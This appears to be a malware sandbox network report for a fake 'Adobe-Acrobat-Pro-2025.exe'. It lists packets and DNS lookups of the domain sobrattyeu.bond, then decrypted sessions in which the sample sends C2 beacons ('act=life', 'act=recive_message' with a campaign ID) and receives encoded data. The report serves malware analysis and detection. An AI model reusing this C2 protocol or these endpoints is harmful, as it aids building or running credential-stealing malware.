Jan 15, 2025 16:14:27.045859098 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.045917988 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.045949936 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.045970917 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.046013117 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.046844006 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.046866894 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.046881914 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.046888113 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.126918077 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.126969099 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.127054930 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.127393007 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.127412081 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.594615936 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.594769001 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.596229076 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.596240997 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.596472979 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:27.605387926 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.605560064 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.605582952 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.407860041 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.407954931 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.408013105 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:28.408185959 CET	49713	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:28.408195019 CET	443	49713	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.425729990 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:28.425771952 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.425837040 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:28.426170111 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:28.426187992 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.912539959 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:28.912666082 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:29.281836033 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:29.281862020 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:29.282242060 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:29.285147905 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:29.285307884 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:29.285339117 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:29.285379887 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:29.327331066 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:32.869333029 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:32.869426966 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:32.869594097 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:32.869905949 CET	49716	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:32.869925022 CET	443	49716	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:32.964478016 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:32.964524031 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:32.964632034 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:32.965025902 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:32.965043068 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:33.444552898 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:33.444611073 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:33.446202040 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:33.446207047 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:33.446429014 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:33.447642088 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:33.447794914 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:33.447813988 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:33.447877884 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:33.447882891 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:34.434756994 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:34.434851885 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:34.434900045 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:34.434983015 CET	49747	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:34.435002089 CET	443	49747	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:34.594629049 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:34.594672918 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:34.594733000 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:34.595473051 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:34.595484018 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:35.079790115 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:35.079971075 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:35.081208944 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:35.081228971 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:35.081495047 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:35.085457087 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:35.085892916 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:35.085901022 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:38.607983112 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:38.608232975 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:38.608509064 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:38.608627081 CET	49759	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:38.608634949 CET	443	49759	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:38.918333054 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:38.918370962 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:38.918437004 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:38.918814898 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:38.918831110 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.403525114 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.403619051 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.404750109 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.404766083 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.405327082 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.409492970 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.410231113 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.410283089 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.410396099 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.410427094 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.412246943 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.412300110 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.412472963 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.412491083 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.412621975 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.412652016 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.416364908 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.416414022 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.416429996 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.416439056 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.416591883 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.416619062 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.416642904 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420057058 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.420245886 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420295954 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420304060 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.420320034 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420341969 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.420439959 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.420510054 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420548916 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:39.420553923 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420568943 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:39.420655012 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.248635054 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.248775005 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.248924971 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.248986006 CET	49791	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.249001026 CET	443	49791	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.253639936 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.253714085 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.253801107 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.254086018 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.254101038 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.715085983 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.715189934 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.717394114 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.717401981 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.717725039 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:42.719441891 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.719507933 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:42.719522953 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211052895 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211199045 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211249113 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.211261988 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211400032 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211462021 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.211468935 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211554050 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211600065 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.211608887 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211719990 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211767912 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.211775064 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211869955 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.211924076 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.211930990 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.212025881 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.212078094 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.212084055 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.212227106 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.212282896 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.212325096 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.212331057 CET	443	49808	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:43.212347984 CET	49808	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:43.212352991 CET	443	49808	104.21.80.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 16:14:21.770875931 CET	61702	53	192.168.2.5	1.1.1.1
Jan 15, 2025 16:14:21.783386946 CET	53	61702	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 16:14:21.770875931 CET	192.168.2.5	1.1.1.1	0x739d	Standard query (0)	sobrattyeu.bond	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:14:21.783386946 CET	1.1.1.1	192.168.2.5	0x739d	No error (0)	sobrattyeu.bond	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sobrattyeu.bond

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:22 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sobrattyeu.bond
2025-01-15 15:14:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-15 15:14:22 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d4e85k3nonpjffftkt0jlg79u1; expires=Sun, 11 May 2025 09:01:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JjMBaIzBCCNZy5Y%2FQ8GS4UoeChy04nvmDB%2BccKgGlIPLQNh5%2FEY0Sk2X0Sf0Itf5DPsqIXXoKVX%2BjvnNOcIOARNi88nsbq3kV1Vcd9Ocr1yxBEcRtlAEhcpljIV4djHUzas%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0aa5f638c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1955&rtt_var=753&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1434184&cwnd=223&unsent_bytes=0&cid=0db94ca27e188471&ts=554&x=0"
2025-01-15 15:14:22 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-15 15:14:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:23 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: sobrattyeu.bond
2025-01-15 15:14:23 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
2025-01-15 15:14:26 UTC	1132	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m79ideb4775bmdotuq9m0grgol; expires=Sun, 11 May 2025 09:01:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cWgCx%2Biby9dIGdenKzydwfl2orHTwsonS2SFVm5xolpTXtqlW4kNMsEKCRf2Gbwa9uqS5%2FEX%2B%2FucrbPhOVRQIKtT77CSEI%2BZfdD63utoXD7mPTfTFP44pZ9%2Bw%2FrcyrOkv4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0b0cfd342d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1581&rtt_var=679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1514522&cwnd=229&unsent_bytes=0&cid=b80b0c0fcb75cf13&ts=3618&x=0"
2025-01-15 15:14:26 UTC	237	IN	Data Raw: 31 34 37 64 0d 0a 72 64 2f 55 71 6b 76 6a 2f 41 55 6b 56 7a 32 53 36 4f 45 6e 4c 6b 64 54 38 68 63 43 57 6d 73 47 6c 6f 76 6f 49 4f 76 78 2b 66 66 57 2f 61 4b 49 63 64 66 51 4a 31 63 79 48 36 69 63 6b 31 4a 4c 61 33 47 54 63 79 42 67 44 57 66 36 2b 49 30 4d 79 59 65 55 31 5a 65 35 74 63 59 34 68 74 41 6e 51 53 38 66 71 4c 4f 61 42 55 73 70 63 63 67 31 5a 7a 41 4a 5a 2f 72 70 69 55 75 45 67 5a 57 55 78 62 4f 7a 77 69 36 41 6d 47 52 49 4f 6c 6a 33 6a 59 42 4e 51 43 34 2b 6d 6e 6f 67 64 6b 6c 6a 37 4b 6e 53 41 71 61 55 6a 5a 62 67 76 71 66 42 61 5a 37 51 66 67 59 79 55 37 44 53 77 30 5a 4c 4a 54 2b 55 63 32 6b 79 41 32 37 79 36 49 78 4b 6d 35 69 66 6e 38 57 39 73 4d 4d 6b 69 59 78 70 51 6a 31 54 38 59 65 Data Ascii: 147drd/Uqkvj/AUkVz2S6OEnLkdT8hcCWmsGlovoIOvx+ffW/aKIcdfQJ1cyH6ick1JLa3GTcyBgDWf6+I0MyYeU1Ze5tcY4htAnQS8fqLOaBUspccg1ZzAJZ/rpiUuEgZWUxbOzwi6AmGRIOlj3jYBNQC4+mnogdklj7KnSAqaUjZbgvqfBaZ7QfgYyU7DSw0ZLJT+Uc2kyA27y6IxKm5ifn8W9sMMkiYxpQj1T8Ye
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 41 42 51 4a 6c 4e 6f 67 31 4f 48 68 61 56 76 66 34 6d 31 65 45 67 35 33 56 30 50 4f 76 69 43 36 4e 33 6a 38 47 50 56 50 2b 6a 34 42 4b 53 79 51 78 67 6e 70 67 4f 77 46 73 38 4f 4f 46 54 59 61 64 6b 5a 4c 48 74 4c 48 48 4c 6f 6d 59 61 45 56 31 45 62 43 4e 6d 77 55 55 5a 52 47 41 64 6d 4d 73 42 48 57 30 39 73 52 62 79 5a 53 58 31 5a 66 39 73 4d 59 6f 6a 4a 35 31 54 6a 35 55 39 5a 69 49 54 45 45 6f 4d 5a 31 2f 62 7a 73 4a 59 2f 37 6a 68 55 69 4e 6e 70 61 54 7a 37 33 32 68 6d 6d 47 68 69 63 65 64 58 7a 31 6d 6f 52 4a 57 6d 63 4c 30 47 6f 75 49 55 6c 6a 2b 4b 6e 53 41 6f 47 57 6d 4a 62 45 73 72 58 41 49 70 4f 65 64 55 41 34 57 75 4b 4d 68 6b 74 47 4a 69 4f 61 65 32 59 37 41 47 2f 39 37 49 31 47 79 64 33 62 6b 74 66 39 37 6f 67 49 6a 4a 56 72 54 43 4a 66 73 4a Data Ascii: ABQJlNog1OHhaVvf4m1eEg53V0POviC6N3j8GPVP+j4BKSyQxgnpgOwFs8OOFTYadkZLHtLHHLomYaEV1EbCNmwUUZRGAdmMsBHW09sRbyZSX1Zf9sMYojJ51Tj5U9ZiITEEoMZ1/bzsJY/7jhUiNnpaTz732hmmGhicedXz1moRJWmcL0GouIUlj+KnSAoGWmJbEsrXAIpOedUA4WuKMhktGJiOae2Y7AG/97I1Gyd3bktf97ogIjJVrTCJfsJ
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 4b 53 4f 63 66 32 59 33 42 47 69 30 70 38 70 46 6b 64 50 44 31 65 57 2b 6f 73 73 6a 77 36 74 6b 53 44 74 59 35 73 71 63 43 31 56 6c 4e 70 77 31 4f 48 67 45 5a 66 7a 76 6d 45 32 45 6b 4a 57 62 77 4c 69 35 77 43 6d 42 6b 32 4a 43 50 6c 54 7a 68 34 64 58 52 69 55 35 6c 58 52 71 4d 6b 6b 71 74 4f 36 53 41 74 48 54 71 6f 4c 45 2f 34 50 4c 4a 34 2b 5a 63 51 59 71 45 65 6e 4b 68 45 6b 4d 66 58 47 64 66 57 55 39 42 6d 58 2b 35 34 39 49 68 5a 75 56 6c 74 32 79 73 73 67 6c 69 5a 52 71 53 44 46 58 2b 59 47 49 51 30 77 6b 4f 39 41 37 49 44 38 52 4a 4b 79 70 76 6b 57 46 6e 70 54 58 2b 72 36 34 78 69 36 58 33 6e 67 49 4c 42 2f 33 68 73 4d 64 44 43 6b 34 6b 48 35 71 50 41 6c 6a 2b 65 79 4a 52 59 71 65 6e 4a 2f 42 75 72 4c 45 49 49 79 59 5a 30 45 78 57 75 4b 50 69 6b 6c Data Ascii: KSOcf2Y3BGi0p8pFkdPD1eW+ossjw6tkSDtY5sqcC1VlNpw1OHgEZfzvmE2EkJWbwLi5wCmBk2JCPlTzh4dXRiU5lXRqMkkqtO6SAtHTqoLE/4PLJ4+ZcQYqEenKhEkMfXGdfWU9BmX+549IhZuVlt2yssgliZRqSDFX+YGIQ0wkO9A7ID8RJKypvkWFnpTX+r64xi6X3ngILB/3hsMdDCk4kH5qPAlj+eyJRYqenJ/BurLEIIyYZ0ExWuKPikl
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 6d 4d 67 4a 30 64 39 74 4f 36 47 41 74 48 54 6b 70 7a 64 73 37 6a 42 4a 49 65 57 59 45 67 34 56 50 61 42 68 45 4a 4b 4b 44 6d 64 63 47 4d 35 44 57 37 6d 36 6f 46 49 68 4a 6e 62 32 34 2b 36 72 6f 68 78 77 62 6c 72 62 79 56 45 34 70 7a 44 57 67 49 38 63 5a 64 35 49 47 42 4a 5a 2f 76 67 68 55 71 42 6e 4a 53 52 77 62 75 77 78 53 79 4f 6c 48 56 4f 4f 31 4c 37 68 59 68 58 54 43 67 31 6e 48 46 6f 4d 77 4d 6b 75 71 6d 4e 57 73 6e 4c 32 36 44 43 73 72 62 4c 50 38 47 42 4b 56 39 31 57 50 7a 4b 32 77 56 41 4b 7a 47 66 65 57 77 7a 41 57 58 34 35 34 31 48 67 4a 75 54 68 38 36 35 76 73 6b 6e 6a 70 39 6a 51 7a 42 62 39 34 36 46 53 67 78 72 63 5a 64 74 49 47 42 4a 53 39 50 63 79 47 4f 7a 30 34 54 62 31 76 32 78 78 47 6e 5a 33 6d 74 46 4f 56 66 2f 6a 49 70 4a 52 69 77 36 Data Ascii: mMgJ0d9tO6GAtHTkpzds7jBJIeWYEg4VPaBhEJKKDmdcGM5DW7m6oFIhJnb24+6rohxwblrbyVE4pzDWgI8cZd5IGBJZ/vghUqBnJSRwbuwxSyOlHVOO1L7hYhXTCg1nHFoMwMkuqmNWsnL26DCsrbLP8GBKV91WPzK2wVAKzGfeWwzAWX4541HgJuTh865vsknjp9jQzBb946FSgxrcZdtIGBJS9PcyGOz04Tb1v2xxGnZ3mtFOVf/jIpJRiw6
2025-01-15 15:14:26 UTC	909	IN	Data Raw: 77 4b 59 50 48 6d 69 30 4f 50 67 5a 79 63 33 62 4f 37 78 79 47 4a 6c 32 5a 43 4d 46 4c 32 68 6f 6c 45 53 79 73 2f 6d 44 55 75 65 41 35 38 74 4c 48 4b 59 35 6d 49 69 59 50 43 6e 4c 76 48 61 5a 37 51 66 67 59 79 55 37 44 53 77 30 78 65 49 54 79 43 66 47 63 32 42 6d 66 6d 36 49 64 4a 6d 35 53 55 6b 63 69 78 73 4d 63 76 67 4a 74 74 53 6a 4a 61 2b 34 57 50 42 51 4a 6c 4e 6f 67 31 4f 48 67 6e 62 2b 66 2b 69 55 79 43 68 59 44 56 30 50 4f 76 69 43 36 4e 33 6a 38 47 4e 6c 54 37 6a 6f 4e 4a 54 43 45 38 6b 47 64 76 50 77 35 74 2f 2f 75 41 52 59 36 59 6b 35 37 41 75 36 54 45 4a 35 4f 62 64 56 52 31 45 62 43 4e 6d 77 55 55 5a 51 65 58 5a 58 41 37 53 31 58 69 36 70 78 4a 68 4a 2f 62 69 6f 47 6b 39 73 38 6c 77 63 59 6e 51 44 70 57 38 34 57 43 54 45 41 6f 4e 4a 6c 77 59 Data Ascii: wKYPHmi0OPgZyc3bO7xyGJl2ZCMFL2holESys/mDUueA58tLHKY5mIiYPCnLvHaZ7QfgYyU7DSw0xeITyCfGc2Bmfm6IdJm5SUkcixsMcvgJttSjJa+4WPBQJlNog1OHgnb+f+iUyChYDV0POviC6N3j8GNlT7joNJTCE8kGdvPw5t//uARY6Yk57Au6TEJ5ObdVR1EbCNmwUUZQeXZXA7S1Xi6pxJhJ/bioGk9s8lwcYnQDpW84WCTEAoNJlwY
